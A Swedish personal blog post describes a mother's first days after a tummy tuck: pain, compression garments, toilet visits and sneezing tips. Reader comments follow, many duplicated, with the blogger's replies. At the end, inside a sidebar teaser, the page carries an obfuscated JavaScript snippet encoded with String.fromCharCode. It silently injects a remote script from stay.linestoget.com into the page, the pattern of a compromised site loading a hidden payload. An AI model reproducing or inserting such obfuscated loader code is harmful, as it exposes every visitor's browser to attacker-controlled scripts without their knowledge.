Saker vi INTE pratar om, bukplastik, toa-besök, hygien och andra ”pinsamma” saker.

imageHej vännen! Jag kan verkligen inte beskriva med ord hur TACKSAM jag är över erat stöd! Alla ni kvinnor, mammor med liknande erfarenheter som delar med er utav dessa till mig, som kommer med råd och tips. Vissa väljer att göra det ”öppet” här på bloggen, andra mailar mig privat. Oavsett vad, -TACK!

Jag vill också passa på att hälsa nya läsare välkomna. För att få ett bättre grepp om vem jag är och VARFÖR jag valde att dela med mig utav min resa och bukplastik så kan ni läsa senaste veckans inlägg…. Men även fråga mig såklart! 🙂

(från strax under 100kg, ner till 52kg som minst lämnade sina spår på min mamma mage, Gym och PT i två år kunde ändå inte ”rädda” magen) 

imageDagens outfit består utav samma två gördlar jag har haft dom senaste dygnen, som jag även kommer att ha kommande 6 veckor (?!) Nya trosor för dagen, vita spets fick det bli idag 🙂 Jag har lärt mig att byta trosor själv nu… Så länge jag ”fångar” upp dom trosorna jag ska ta av mig med foten, så att dom INTE hamnar på golvet (dit tar jag mig inte) så går det jätte bra!

-jag känner en hat/kärlek till gödeln! Kan varken leva med eller utan den 😉

lite samma känsla som till min X-man! Haha! -Skoja bara! 

Efter nattens bekymmer med en nys-attack så fick jag många mail och råd kring detta… Tack….  några kvinnor blottade sig även och tog upp problematiken med att gå på toaletten

-ni vet, göra tvåan! Gode gud! Det vill man inte göra när man är nyopererad!!!

precis som efter förlossningen så har jag bestämt mig för att ALDRIG mera göra det! -Haha! Ja, det funkar ju sisådär… 😉

Fyra saker att undvika efter bukplastik: Nysningar, host-attacker, toa-besök ”nr2” och värst av allt magsjuka! -Big no no!

Att vara helt uppskuren i buken, ihopsydd inne i mag/buk muskelaturen OCH från ena sidan till andra Ytligt, plus några stygn kring naveln och några till lite här och var.

-Det gör skit ont!

Så tipset om att lägga en kudde mot magen vid nysattacker, eller på toan, tex ÄR VARMT välkomna! Alla tips är välkomna! 

image

Att dessutom gå på toan med gördeln på…. Känns ju lite konstigt i sig! -haha! Ser ni beslutsamheten i blicken???

”jag SKA inte” hahaha! Skömtosido! 

Detta är ju ytterligare en sak man INTE ”pratar om” Man pratar inte om bukplastik, man visar inga ”ful” bilder, man ska alltid vara så Perfekt, man pratar inte om pinsamma saker…..äsch! Mer ärlighet!

 jag drömmer om att kunna bära bikini igen och springa hand i hand med min älskade Lilleman på stranden.  -So, i take the pain 😉

Men när jag valde att visa upp, för mig mitt största kroppskomplex dvs min skrynkliga mage för er,  så öppnade det upp för en ärlig dialog mellan mig och er, och även mellan er sinsemellan!

-Fantastiskt!

Jag vände och vred på mig själv utav beslutsångest innan jag tillslut vågade trycka ”pubilcera” på inlägget med min mage i fokus, där jag även lovade er att få följa mig på denna resan…

Trots smärtan, tillståndet som mer eller mindre handikappad, trots att jag har ett fågelbo av trassel i håret, luktar som en skunk och känner mig så långt ifrån kvinnlig och fräsch man kan komma….

-så ÄR jag så otroligt glad över att jag äntligen bestämde mig för att göra bukplastiken. det tog mig flera konsultationer och 3,5år att bestämma mig… -Varför har jag inte gjort det tidigare?! 

image

Svullnaden är kvar… Magen ser fortfarande lite läskig ut.. Naveln är extra obehaglig! 

För bara en vecka sedan så var jag klädd i denna vackra Ida Sjöstedt klänning ifrån BLUECO  (kika in på deras webbshop HÄR) Den känslan av kvinnlighet, renlighet känns som ljusår bort!!! 😉

image

Även om jag visste om att det var ett par dagar kvar till operationen så hade jag inte en aning om vad som väntad….. Nu längtar jag bara tills det att jag kan stå rakt igen Och kunna lyfta upp och krama min lilleman… ( 4 år )

Vi hörs sen min fina vän! Kramar / My Martens

41 Komentarer

 1. Är med sorg i hjärtat jag läser om hur du utsätter dig för detta. Att du inte kan älska dig själv utan en perfekt utsida. Frågan är om det räcker? Är du verkligen lyckligare nu? Tyckte att det var starkt av dig att visa upp hur en mage faktiskt kan se ut efter en graviditet, men att i nästa mening skriva om att du ska lösa detta med operation visar ju bara för dig själv och andra kvinnor i samma situation att de inte duger som de är.

  • Hej Maja! Jag läser vad du skriver, men håller inte med dig… Jag visar upp mitt största kroppskomplex, magen. Jag talar i samma inlägg om vad jag bestämt mig för att göra åt det. Att jag länge (3,5år) funderat noga för att vara säker på mitt beslut…. Det handlar INTE om att inte duga, där är du helt utanför mitt synsätt…. Det handlar om friheten att själv få bestämma över sin kropp och att ha den möjligheten att göra någonting åt det. Med denna operationen kommer jag att kunna träna mag-pertiet igen, på ett sätt jag utan att man sytt ihop min brustna magmuskelatur aldrig hade kunnat göra…. Jag påtalar också att alla duger precis som man är, men att det viktiga är att oavsett om man tar hjälp utav plastikkirurgi eller inte så ska man INTE tro att självkänslan kommer genom en operation… Det sitter djupare än så. Om det var värt det? -ja, 100% kramar my

 2. Du är helt underbar och så modig när du delar med dig av detta. Jag undrar ju om du inte har två gördlar så du kan byta och tvätta dem? Tänker när det är ”den tiden i månaden” då du måste ha bindor, det kan ju bli lite ofräscht då, våtservetter är bra. =) Jag vet hur det känns att vara opererad i buken, jag hade en kudde på magen typ hela tiden då jag tyckte det hjälpte att försiktigt trycka den mot magen när man ville hosta eller annat som frestade på magmusklerna. Ett litet mottryck med kudden dämpade lite av den smärtan, kanske mest var psykologiskt men var även ett litet skydd mot att någon annan skulle av misstag råka stöta mot min mage, tex. husdjur som vill ha närhet.

 3. Nästa söndag är det sex månader sedan min bukoperation ! för magen, cocosolja! Gör smoothie med det i. Smörjer magen. Funkade bra för mig!
  Till nr 1 hade jag en plastmugg där jag klippte bort botten, funkade som tratt!
  Hade två gördlar, har en hudfärgad small och en vit om du är intresserad att köpa loss billigt. ?
  IG FruNyren

 4. Är med sorg i hjärtat jag läser om hur du utsätter dig för detta. Att du inte kan älska dig själv utan en perfekt utsida. Frågan är om det räcker? Är du verkligen lyckligare nu? Tyckte att det var starkt av dig att visa upp hur en mage faktiskt kan se ut efter en graviditet, men att i nästa mening skriva om att du ska lösa detta med operation visar ju bara för dig själv och andra kvinnor i samma situation att de inte duger som de är.

  • Hej Maja! Jag läser vad du skriver, men håller inte med dig… Jag visar upp mitt största kroppskomplex, magen. Jag talar i samma inlägg om vad jag bestämt mig för att göra åt det. Att jag länge (3,5år) funderat noga för att vara säker på mitt beslut…. Det handlar INTE om att inte duga, där är du helt utanför mitt synsätt…. Det handlar om friheten att själv få bestämma över sin kropp och att ha den möjligheten att göra någonting åt det. Med denna operationen kommer jag att kunna träna mag-pertiet igen, på ett sätt jag utan att man sytt ihop min brustna magmuskelatur aldrig hade kunnat göra…. Jag påtalar också att alla duger precis som man är, men att det viktiga är att oavsett om man tar hjälp utav plastikkirurgi eller inte så ska man INTE tro att självkänslan kommer genom en operation… Det sitter djupare än så. Om det var värt det? -ja, 100% kramar my

 5. Du är helt underbar och så modig när du delar med dig av detta. Jag undrar ju om du inte har två gördlar så du kan byta och tvätta dem? Tänker när det är ”den tiden i månaden” då du måste ha bindor, det kan ju bli lite ofräscht då, våtservetter är bra. =) Jag vet hur det känns att vara opererad i buken, jag hade en kudde på magen typ hela tiden då jag tyckte det hjälpte att försiktigt trycka den mot magen när man ville hosta eller annat som frestade på magmusklerna. Ett litet mottryck med kudden dämpade lite av den smärtan, kanske mest var psykologiskt men var även ett litet skydd mot att någon annan skulle av misstag råka stöta mot min mage, tex. husdjur som vill ha närhet.

 6. Nästa söndag är det sex månader sedan min bukoperation ! för magen, cocosolja! Gör smoothie med det i. Smörjer magen. Funkade bra för mig!
  Till nr 1 hade jag en plastmugg där jag klippte bort botten, funkade som tratt!
  Hade två gördlar, har en hudfärgad small och en vit om du är intresserad att köpa loss billigt. 🙂
  IG FruNyren

 7. Hej My.
  Tack för att du visar en ärlighet till oss läsare. Jag önskar att jag kunde operera min mage så man kan få känna sig fin och vacker. Man vill ju inte se ut som hej kom och hjälp mig för det påverkar ju hur andra ser på en. Nu talar jag absolut inte om att man ska se ut som en fotomodell, utan att man ska känna sig fin på in OCH utsidan så att JAG är nöjd. Sen får alla andra döma mig för att jag tycker så…..
  Jag undrar bara vad din goa hund Tezz är nu? Det måste vara svårt att ha henne hemma tänker jag….Och jag kan förstå att du saknar ihjäl dig efter Ludvig och ev Tezz.
  Hoppas att du snart blir tillräckligt stark att du kan få hem dom
  Krya på dig så gott du kan

 8. Usch vad jag lider med dig!
  Jag blev opererad efter de upptäckt cancer i livmodern. Ont som helvete.
  Men du har ju dubbelt så långt snitt. ?
  Det är nån som har kommenterat det innan: kan du prova att sova halvsittande med stabila kuddar i ryggen så tror jag det kan hjälpa massor. Jag fixade inte att ligga raklång den första veckan.
  Kramar i massor från nya läsaren Marie i Värnamo

 9. Hej My.
  Tack för att du visar en ärlighet till oss läsare. Jag önskar att jag kunde operera min mage så man kan få känna sig fin och vacker. Man vill ju inte se ut som hej kom och hjälp mig för det påverkar ju hur andra ser på en. Nu talar jag absolut inte om att man ska se ut som en fotomodell, utan att man ska känna sig fin på in OCH utsidan så att JAG är nöjd. Sen får alla andra döma mig för att jag tycker så…..
  Jag undrar bara vad din goa hund Tezz är nu? Det måste vara svårt att ha henne hemma tänker jag….Och jag kan förstå att du saknar ihjäl dig efter Ludvig och ev Tezz.
  Hoppas att du snart blir tillräckligt stark att du kan få hem dom
  Krya på dig så gott du kan

 10. Usch vad jag lider med dig!
  Jag blev opererad efter de upptäckt cancer i livmodern. Ont som helvete.
  Men du har ju dubbelt så långt snitt. 🙁
  Det är nån som har kommenterat det innan: kan du prova att sova halvsittande med stabila kuddar i ryggen så tror jag det kan hjälpa massor. Jag fixade inte att ligga raklång den första veckan.

  Kramar i massor från nya läsaren Marie i Värnamo

 11. Hej my! Vad modig du är! Du verkar va en snäll o go människa:). Jag har en sån där hemsk sladdrig skrynklig mage har tänkt tanken några gånger innan o göra samma sak som du, tänker på det mer dom gånger man reser el när de är sommar. Har alltid baddräkt på mig. Känns som jag är den enda på alla stränder som har de. O inte tal om de mina bröst är också skrynkliga:(. Har du gjort något me dina? Jag vill ej ha större men ändå få bort de där skrynkliga (kan aldrig ha urringat så det är viktigt att baddräkten ej är för urringad också:(. Det som oroar mig väldigt mycke är att jag har sprutfobi! Särskilt vid armvecket! Dom gånger jag fått det där el på överarmen har jag nästan svimmat o mått illa. Isåfall får jag ta en lugnade tablett innan. Hur gick det för dig? Fick du många sprutor innan operationen?
  Jag gläds me dig o önskar att jag också vågade.
  Kram

 12. Hej my! Vad modig du är! Du verkar va en snäll o go människa:). Jag har en sån där hemsk sladdrig skrynklig mage har tänkt tanken några gånger innan o göra samma sak som du, tänker på det mer dom gånger man reser el när de är sommar. Har alltid baddräkt på mig. Känns som jag är den enda på alla stränder som har de. O inte tal om de mina bröst är också skrynkliga:(. Har du gjort något me dina? Jag vill ej ha större men ändå få bort de där skrynkliga (kan aldrig ha urringat så det är viktigt att baddräkten ej är för urringad också:(. Det som oroar mig väldigt mycke är att jag har sprutfobi! Särskilt vid armvecket! Dom gånger jag fått det där el på överarmen har jag nästan svimmat o mått illa. Isåfall får jag ta en lugnade tablett innan. Hur gick det för dig? Fick du många sprutor innan operationen?
  Jag gläds me dig o önskar att jag också vågade.
  Kram

 13. Jag är enormt impad av dig My . Ensamstående egen företagare nu stor op slutat röka . Hatten av för dig alltså. Jag har själv gått ner 50 kg i vikt gått upp dom igen och ytterligare ner igen. Jag ser inte rolig ut i huden

 14. Jag är enormt impad av dig My . Ensamstående egen företagare nu stor op slutat röka . Hatten av för dig alltså. Jag har själv gått ner 50 kg i vikt gått upp dom igen och ytterligare ner igen. Jag ser inte rolig ut i huden

 15. Vet inte om länken funkar men så här såg jag och min vän ut ett par dagar efter vår njurdonation/transplantation när vi var ute och sladdade i sjukhuskorridoren

 16. Vet inte om länken funkar men så här såg jag och min vän ut ett par dagar efter vår njurdonation/transplantation när vi var ute och sladdade i sjukhuskorridoren

 17. Heja My…..
  Jag lider lite med dig på vissa bilder, även om du försöker le lite…..jag hoppas verkligen du har en stab runt dig som kommer med mat och allt vad du kan behöva hjälp med nu. ”I nöden prövas vännen”….
  Du vinner så mycket på att vara öppen i detta, sen vad folk tycker o tänker (i negativ riktning) behöver du inte lägga energi på tycker jag. Hur man än gör kan man aldrig vara alla till lags…..ska gudarna veta.
  kram nu och ha en bra måndag.

 18. Heja My…..
  Jag lider lite med dig på vissa bilder, även om du försöker le lite…..jag hoppas verkligen du har en stab runt dig som kommer med mat och allt vad du kan behöva hjälp med nu. ”I nöden prövas vännen”….
  Du vinner så mycket på att vara öppen i detta, sen vad folk tycker o tänker (i negativ riktning) behöver du inte lägga energi på tycker jag. Hur man än gör kan man aldrig vara alla till lags…..ska gudarna veta.
  kram nu och ha en bra måndag.

 19. Hej My! Ska nu göra samma op, på Citadellkliniken också, som du gjort om ett par dagar. Ville bara höra hur du känner idag, två år efter? Är du nöjd och var det en jobbig väg tillbaka till träning och vardag?

  • Jag är jätte nöjd:) dom var fantastiska på Citadell kliniken ? hölsa dr Tuve och dom andra från mig.. Det var lååååång vög tillbaka efter OP. Både med rejälas och träning. Jag rehab tränade i 1.5år. Men det var det värt. Skulle göra om det 7 dagar i veckan! MEN, se till att ha bra stöd/hjälp hemma första dagarna, eller egentligen första veckan.. -lycka till! Kram

 20. Hej My! Ska nu göra samma op, på Citadellkliniken också, som du gjort om ett par dagar. Ville bara höra hur du känner idag, två år efter? Är du nöjd och var det en jobbig väg tillbaka till träning och vardag?

  • Jag är jätte nöjd:) dom var fantastiska på Citadell kliniken 🙂 hölsa dr Tuve och dom andra från mig.. Det var lååååång vög tillbaka efter OP. Både med rejälas och träning. Jag rehab tränade i 1.5år. Men det var det värt. Skulle göra om det 7 dagar i veckan! MEN, se till att ha bra stöd/hjälp hemma första dagarna, eller egentligen första veckan.. -lycka till! Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/